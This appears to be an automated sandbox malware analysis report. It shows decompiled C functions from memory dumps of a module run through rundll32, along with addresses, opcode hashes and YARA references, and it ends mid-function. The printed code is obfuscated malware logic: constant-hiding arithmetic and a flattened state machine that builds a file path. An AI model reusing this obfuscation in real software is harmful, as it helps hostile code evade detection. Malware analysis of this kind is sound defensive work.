                                                                                                                      0x002b86e2
                                                                                                                      0x002b86e5
                                                                                                                      0x002b86ec
                                                                                                                      0x002b86f3
                                                                                                                      0x002b86fe
                                                                                                                      0x002b8701
                                                                                                                      0x002b870b
                                                                                                                      0x002b8710
                                                                                                                      0x002b8719
                                                                                                                      0x002b8720
                                                                                                                      0x002b8727
                                                                                                                      0x002b872e
                                                                                                                      0x002b873a
                                                                                                                      0x002b873f
                                                                                                                      0x002b8747
                                                                                                                      0x002b874a
                                                                                                                      0x002b874d
                                                                                                                      0x002b8765
                                                                                                                      0x002b8769
                                                                                                                      0x002b876a
                                                                                                                      0x002b8771
                                                                                                                      0x002b8772
                                                                                                                      0x002b877c
                                                                                                                      0x002b8785

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: u8
                                                                                                                      • API String ID: 0-999499730
                                                                                                                      • Opcode ID: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction ID: 7a62e180fa3a2faf3240cbebc8af2620013c8db226fa58cdcbc5916c3c735027
                                                                                                                      • Opcode Fuzzy Hash: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction Fuzzy Hash: C7311471D00209EBDB09CFA5C98AAEFBBB1FF44314F208099E515B62A0D7B55B64CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BEC9B Relevance: 1.3, Strings: 1, Instructions: 84COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002BEC9B(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _t99;
				intOrPtr _t104;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_v52 = _v52 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v56 = 0x52d5fa;
				_v32 = 0xd2ae86;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x0000dff8;
				_v8 = 0x945d31;
				_v8 = _v8 >> 9;
				_v8 = _v8 | 0xfea629bb;
				_t114 = __edx;
				_v8 = _v8 * 0x68;
				_v8 = _v8 ^ 0x739e55b5;
				_v16 = 0xe343a6;
				_v16 = _v16 + 0xffffaeee;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0x5e55869e;
				_v28 = 0xa35055;
				_v28 = _v28 ^ 0xccdb3a8a;
				_v28 = _v28 ^ 0xcc747f7c;
				_v12 = 0x417a71;
				_t115 = 0xc;
				_v12 = _v12 / _t115;
				_v12 = _v12 + 0xffffd743;
				_v12 = _v12 ^ 0x254bb370;
				_v12 = _v12 ^ 0x25474737;
				_v36 = 0x5ce014;
				_v36 = _v36 << 0xb;
				_v36 = _v36 ^ 0xe70ab788;
				_v20 = 0x24db01;
				_t116 = 0x63;
				_v20 = _v20 * 0x3c;
				_v20 = _v20 + 0xe28f;
				_v20 = _v20 ^ 0x08ab7f21;
				_v44 = 0x4977db;
				_v44 = _v44 * 0x38;
				_v44 = _v44 ^ 0x1015e45e;
				_v24 = 0xa0027c;
				_v24 = _v24 | 0xcfe9110c;
				_v24 = _v24 + 0xffff4bac;
				_v24 = _v24 ^ 0xcfe5f801;
				_v40 = 0x81bf9e;
				_v40 = _v40 / _t116;
				_v40 = _v40 ^ 0x000d137a;
				_push(_v28);
				_push(_v16);
				_push(__ecx);
				_t99 = E002D07D7(_v12, _v36, E002BAB66(_v32, _v8, _v40), _v20);
				_t104 =  *0x2d5c8c; // 0x0
				 *((intOrPtr*)(_t104 + 4 + _t114 * 4)) = _t99;
				return E002BAE03(_v44, _v24, _v40, _t98);
			}





















                                                                                                                      0x002beca1
                                                                                                                      0x002beca5
                                                                                                                      0x002beca9
                                                                                                                      0x002becb0
                                                                                                                      0x002becb7
                                                                                                                      0x002becbb
                                                                                                                      0x002becc2
                                                                                                                      0x002becc9
                                                                                                                      0x002beccd
                                                                                                                      0x002becdc
                                                                                                                      0x002bece0
                                                                                                                      0x002bece3
                                                                                                                      0x002becea
                                                                                                                      0x002becf1
                                                                                                                      0x002becf8
                                                                                                                      0x002becfc
                                                                                                                      0x002bed03
                                                                                                                      0x002bed0a
                                                                                                                      0x002bed11
                                                                                                                      0x002bed18
                                                                                                                      0x002bed22
                                                                                                                      0x002bed27
                                                                                                                      0x002bed2c
                                                                                                                      0x002bed33
                                                                                                                      0x002bed3a
                                                                                                                      0x002bed41
                                                                                                                      0x002bed48
                                                                                                                      0x002bed4c
                                                                                                                      0x002bed53
                                                                                                                      0x002bed5e
                                                                                                                      0x002bed5f
                                                                                                                      0x002bed62
                                                                                                                      0x002bed69
                                                                                                                      0x002bed70
                                                                                                                      0x002bed7b
                                                                                                                      0x002bed7e
                                                                                                                      0x002bed85
                                                                                                                      0x002bed8c
                                                                                                                      0x002bed93
                                                                                                                      0x002bed9a
                                                                                                                      0x002beda1
                                                                                                                      0x002bedad
                                                                                                                      0x002bedb0
                                                                                                                      0x002bedb7
                                                                                                                      0x002bedba
                                                                                                                      0x002bedc0
                                                                                                                      0x002bedd5
                                                                                                                      0x002bedda
                                                                                                                      0x002bede7
                                                                                                                      0x002bedfb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7GG%
                                                                                                                      • API String ID: 0-3444672964
                                                                                                                      • Opcode ID: 77a33a43522827b7988bc72f8aff0ef2b26dc8db63aef5a84c29ec95d63c0cb5
                                                                                                                      • Instruction ID: 9b3a47b4033023d2ba6a04fec12790498e49fccf154edb0741821abf80965a40
                                                                                                                      • Opcode Fuzzy Hash: 77a33a43522827b7988bc72f8aff0ef2b26dc8db63aef5a84c29ec95d63c0cb5
                                                                                                                      • Instruction Fuzzy Hash: FE41F3B1C01219EFCB08CFE5C98A9DEBFB1FB44314F208199D511BA260C7B51A45CFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C3512 Relevance: 1.3, Strings: 1, Instructions: 64COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C3512(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t83;
				void* _t88;

				_v36 = _v36 & 0x00000000;
				_v48 = 0xd3138f;
				_v44 = 0xbafb06;
				_v40 = 0xb4c902;
				_v28 = 0x9a00a8;
				_v28 = _v28 + 0xffff4980;
				_v28 = _v28 + 0xffff4b07;
				_v28 = _v28 ^ 0x00989527;
				_v12 = 0x37fcba;
				_v12 = _v12 + 0xffff1054;
				_v12 = _v12 ^ 0xaae49dfe;
				_v12 = _v12 | 0x5520ddcc;
				_v12 = _v12 ^ 0xfff3c0c4;
				_v8 = 0xafb0cb;
				_t88 = __ecx;
				_t83 = 0x7b;
				_v8 = _v8 / _t83;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffff2cb4;
				_v8 = _v8 ^ 0x0b6cc095;
				_v24 = 0x7eb81c;
				_v24 = _v24 | 0x606632c5;
				_v24 = _v24 + 0x73a0;
				_v24 = _v24 * 0x3c;
				_v24 = _v24 ^ 0x9dca2ad3;
				_v20 = 0x11602;
				_v20 = _v20 * 0x5d;
				_v20 = _v20 + 0xd70f;
				_v20 = _v20 + 0x91d0;
				_v20 = _v20 ^ 0x006b4c23;
				_v32 = 0x7d7f;
				_v32 = _v32 + 0x7879;
				_v32 = _v32 ^ 0x000fb411;
				_v16 = 0xa8b2e1;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0xffff543c;
				_v16 = _v16 ^ 0xd60d7738;
				_v16 = _v16 ^ 0x29f40b7c;
				return E002B7A47(_v28, _v24, _v20, E002C5BB3(), _t88, _v32, _v16);
			}
















                                                                                                                      0x002c3518
                                                                                                                      0x002c351e
                                                                                                                      0x002c3525
                                                                                                                      0x002c352c
                                                                                                                      0x002c3533
                                                                                                                      0x002c353a
                                                                                                                      0x002c3541
                                                                                                                      0x002c3548
                                                                                                                      0x002c354f
                                                                                                                      0x002c3556
                                                                                                                      0x002c355d
                                                                                                                      0x002c3564
                                                                                                                      0x002c356b
                                                                                                                      0x002c3572
                                                                                                                      0x002c357d
                                                                                                                      0x002c3581
                                                                                                                      0x002c3584
                                                                                                                      0x002c3587
                                                                                                                      0x002c358b
                                                                                                                      0x002c3592
                                                                                                                      0x002c3599
                                                                                                                      0x002c35a0
                                                                                                                      0x002c35a7
                                                                                                                      0x002c35b2
                                                                                                                      0x002c35b5
                                                                                                                      0x002c35bc
                                                                                                                      0x002c35c7
                                                                                                                      0x002c35ca
                                                                                                                      0x002c35d1
                                                                                                                      0x002c35d8
                                                                                                                      0x002c35df
                                                                                                                      0x002c35e6
                                                                                                                      0x002c35ed
                                                                                                                      0x002c35f4
                                                                                                                      0x002c35fb
                                                                                                                      0x002c35ff
                                                                                                                      0x002c3606
                                                                                                                      0x002c360d
                                                                                                                      0x002c363c

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #Lk
                                                                                                                      • API String ID: 0-1139186034
                                                                                                                      • Opcode ID: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction ID: 4214c31ad117165459d2d1bcc2c4c95bad5b1e87411d441bbd0d91e0e8b1cebf
                                                                                                                      • Opcode Fuzzy Hash: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction Fuzzy Hash: 0B31CDB1C0131EABCB98CFA5C94A5EEBBB5BF14318F208198D515B6260D3B91B45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100323E2 Relevance: .4, Instructions: 384COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10031FC2 Relevance: .4, Instructions: 378COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10031BB6 Relevance: .4, Instructions: 361COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100317E2 Relevance: .4, Instructions: 351COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BFD8C Relevance: .2, Instructions: 164COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E002BFD8C() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				short _t136;
				short _t138;
				signed int _t141;
				signed int _t144;
				void* _t145;
				void* _t146;
				intOrPtr _t164;
				void* _t165;
				short* _t166;
				short* _t167;
				void* _t168;
				short* _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t174;

				_t164 =  *0x2d520c; // 0x0
				_v8 = 0xafc848;
				_t165 = _t164 + 0x220;
				_t146 = 0xaad6b4c;
				_t170 = 0xc;
				_v8 = _v8 / _t170;
				_v8 = _v8 ^ 0xeddef8c6;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0edbb261;
				_v16 = 0xa05fce;
				_v16 = _v16 + 0x102e;
				_v16 = _v16 + 0x8702;
				_v16 = _v16 ^ 0x00a5637b;
				_v48 = 0xdd0656;
				_v48 = _v48 >> 2;
				_v48 = _v48 ^ 0x00330133;
				_v24 = 0x8dacbc;
				_t144 = 0x5c;
				_t171 = 0x3d;
				_v24 = _v24 * 0x19;
				_v24 = _v24 / _t144;
				_v24 = _v24 ^ 0x00283487;
				_v20 = 0x519264;
				_t145 = 2;
				_v20 = _v20 * 0x67;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x41a5f983;
				_v32 = 0xc0edbc;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdc023425;
				_v28 = 0xb6ecb7;
				_v28 = _v28 * 0x1e;
				_v28 = _v28 + 0x349f;
				_v28 = _v28 ^ 0x156255f9;
				_v36 = 0x8be990;
				_v36 = _v36 | 0x6444358b;
				_v36 = _v36 * 0x59;
				_v36 = _v36 ^ 0x0c402a41;
				_v52 = 0xcdd122;
				_v52 = _v52 ^ 0xde2c2ef8;
				_v52 = _v52 ^ 0xdee78ce8;
				_v40 = 0xa1b7cb;
				_v40 = _v40 ^ 0x66c9ba9b;
				_v40 = _v40 + 0xffffb195;
				_v40 = _v40 ^ 0x666fdaad;
				_v56 = 0x9437d4;
				_v56 = _v56 / _t171;
				_v56 = _v56 ^ 0x00087e9b;
				_v12 = 0x6793e4;
				_v12 = _v12 << 2;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000c2cdf;
				_v44 = 0x8cb917;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 << 6;
				_v44 = _v44 ^ 0x00016464;
				do {
					while(_t146 != 0xa09253) {
						if(_t146 == 0x53e5fac) {
							_t172 = E002BEF71(4, 0x10);
							_push(_t172);
							_push(_v56);
							_push(_t165);
							E002B5A07(1, _v40);
							_t174 = _t174 + 0x14;
							_t167 = _t165 + _t172 * 2;
							_t146 = 0xa09253;
							_t136 = 0x2e;
							 *_t167 = _t136;
							_t165 = _t167 + _t145;
							continue;
						} else {
							if(_t146 == 0xaad6b4c) {
								_t138 = E002B5AE2(_t146);
								_t146 = 0xd305119;
								continue;
							} else {
								if(_t146 == 0xd305119) {
									_t141 = E002BEF71(4, 0x10);
									_push(1);
									_push(_v20);
									_push(_t165);
									_t173 = _t141;
									E002B5A07(_t145, _v24);
									_push(_t173);
									_push(_v28);
									_t168 = _t165 + _t145;
									_push(_t168);
									E002B5A07(1, _v32);
									_t174 = _t174 + 0x20;
									_t169 = _t168 + _t173 * 2;
									_t146 = 0x53e5fac;
									_t138 = 0x5c;
									 *_t169 = _t138;
									_t165 = _t169 + _t145;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(3);
					_push(_v44);
					_push(_t165);
					E002B5A07(1, _v12);
					_t166 = _t165 + 6;
					_t174 = _t174 + 0xc;
					_t146 = 0xc2dacde;
					 *_t166 = 0;
					_t165 = _t166 + _t145;
					L9:
				} while (_t146 != 0xc2dacde);
				return _t138;
			}

































                                                                                                                      0x002bfd95
                                                                                                                      0x002bfd9d
                                                                                                                      0x002bfda4
                                                                                                                      0x002bfdad
                                                                                                                      0x002bfdb4
                                                                                                                      0x002bfdb9
                                                                                                                      0x002bfdbe
                                                                                                                      0x002bfdc5
                                                                                                                      0x002bfdc9
                                                                                                                      0x002bfdd0
                                                                                                                      0x002bfdd7
                                                                                                                      0x002bfdde
                                                                                                                      0x002bfde5
                                                                                                                      0x002bfdec
                                                                                                                      0x002bfdf3
                                                                                                                      0x002bfdf7
                                                                                                                      0x002bfdfe
                                                                                                                      0x002bfe09
                                                                                                                      0x002bfe0c
                                                                                                                      0x002bfe0f
                                                                                                                      0x002bfe19
                                                                                                                      0x002bfe1c
                                                                                                                      0x002bfe23
                                                                                                                      0x002bfe2e
                                                                                                                      0x002bfe2f
                                                                                                                      0x002bfe32
                                                                                                                      0x002bfe35
                                                                                                                      0x002bfe3c
                                                                                                                      0x002bfe47
                                                                                                                      0x002bfe4a
                                                                                                                      0x002bfe4e
                                                                                                                      0x002bfe55
                                                                                                                      0x002bfe60
                                                                                                                      0x002bfe63
                                                                                                                      0x002bfe6a
                                                                                                                      0x002bfe71
                                                                                                                      0x002bfe78
                                                                                                                      0x002bfe83
                                                                                                                      0x002bfe86
                                                                                                                      0x002bfe8d
                                                                                                                      0x002bfe94
                                                                                                                      0x002bfe9b
                                                                                                                      0x002bfea2
                                                                                                                      0x002bfea9
                                                                                                                      0x002bfeb0
                                                                                                                      0x002bfeb7
                                                                                                                      0x002bfebe
                                                                                                                      0x002bfeca
                                                                                                                      0x002bfecd
                                                                                                                      0x002bfed4
                                                                                                                      0x002bfedb
                                                                                                                      0x002bfedf
                                                                                                                      0x002bfee3
                                                                                                                      0x002bfee7
                                                                                                                      0x002bfeee
                                                                                                                      0x002bfef5
                                                                                                                      0x002bfef9
                                                                                                                      0x002bfefd
                                                                                                                      0x002bff04
                                                                                                                      0x002bff04
                                                                                                                      0x002bff16
                                                                                                                      0x002bff92
                                                                                                                      0x002bff96
                                                                                                                      0x002bff97
                                                                                                                      0x002bff9e
                                                                                                                      0x002bff9f
                                                                                                                      0x002bffa4
                                                                                                                      0x002bffa7
                                                                                                                      0x002bffaa
                                                                                                                      0x002bffb1
                                                                                                                      0x002bffb2
                                                                                                                      0x002bffb5
                                                                                                                      0x00000000
                                                                                                                      0x002bff18
                                                                                                                      0x002bff1e
                                                                                                                      0x002bff77
                                                                                                                      0x002bff7c
                                                                                                                      0x00000000
                                                                                                                      0x002bff20
                                                                                                                      0x002bff26
                                                                                                                      0x002bff36
                                                                                                                      0x002bff3b
                                                                                                                      0x002bff3d
                                                                                                                      0x002bff45
                                                                                                                      0x002bff46
                                                                                                                      0x002bff48
                                                                                                                      0x002bff4d
                                                                                                                      0x002bff4e
                                                                                                                      0x002bff56
                                                                                                                      0x002bff59
                                                                                                                      0x002bff5a
                                                                                                                      0x002bff5f
                                                                                                                      0x002bff62
                                                                                                                      0x002bff65
                                                                                                                      0x002bff6c
                                                                                                                      0x002bff6d
                                                                                                                      0x002bff70
                                                                                                                      0x00000000
                                                                                                                      0x002bff70
                                                                                                                      0x002bff26
                                                                                                                      0x002bff1e
                                                                                                                      0x00000000
                                                                                                                      0x002bff16
                                                                                                                      0x002bffbc
                                                                                                                      0x002bffbe
                                                                                                                      0x002bffc6
                                                                                                                      0x002bffc8
                                                                                                                      0x002bffcd
                                                                                                                      0x002bffd2
                                                                                                                      0x002bffd5
                                                                                                                      0x002bffda
                                                                                                                      0x002bffdd
                                                                                                                      0x002bffdf
                                                                                                                      0x002bffdf
                                                                                                                      0x002bfff1

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fd4c091fded871f214a2cb25c77759b6ad8625bc4cc70d854d137aa0805295f2
                                                                                                                      • Instruction ID: 775444558ca99efd789c8055ed58d5d40008b22b5b279b93fc602580f27e2f24
                                                                                                                      • Opcode Fuzzy Hash: fd4c091fded871f214a2cb25c77759b6ad8625bc4cc70d854d137aa0805295f2
                                                                                                                      • Instruction Fuzzy Hash: 0C615675D11209ABDF08DFA4C98AAEEFBB1FF48314F204119E612BB290D3B51A55CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CE498 Relevance: .1, Instructions: 113COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E002CE498(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v68;
				intOrPtr _v72;
				char _v592;
				void* _t122;
				signed int _t137;
				signed int _t138;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t122);
				_v72 = 0xec580c;
				asm("stosd");
				_t137 = 0x76;
				asm("stosd");
				asm("stosd");
				_v48 = 0xa71dc1;
				_v48 = _v48 << 0x10;
				_v48 = _v48 ^ 0x1dc99f4e;
				_v8 = 0x906d24;
				_v8 = _v8 | 0x748f1c77;
				_v8 = _v8 + 0xffff13d2;
				_v8 = _v8 * 0x4a;
				_v8 = _v8 ^ 0xb5d1b34d;
				_v32 = 0x99e404;
				_v32 = _v32 ^ 0xe9d0d5f4;
				_v32 = _v32 + 0x5a31;
				_v32 = _v32 ^ 0xe94bd9b5;
				_v16 = 0xd98a19;
				_v16 = _v16 + 0xffff99bf;
				_v16 = _v16 + 0x1a5b;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x64f05351;
				_v40 = 0x441d8c;
				_v40 = _v40 + 0xbe9c;
				_t138 = 0x7a;
				_v40 = _v40 / _t137;
				_v40 = _v40 ^ 0x00086b18;
				_v20 = 0xfc7ad5;
				_v20 = _v20 + 0x78e5;
				_v20 = _v20 + 0xffff6dfc;
				_v20 = _v20 + 0xa8d2;
				_v20 = _v20 ^ 0x00f25a11;
				_v44 = 0xb09661;
				_v44 = _v44 << 2;
				_v44 = _v44 + 0x5c70;
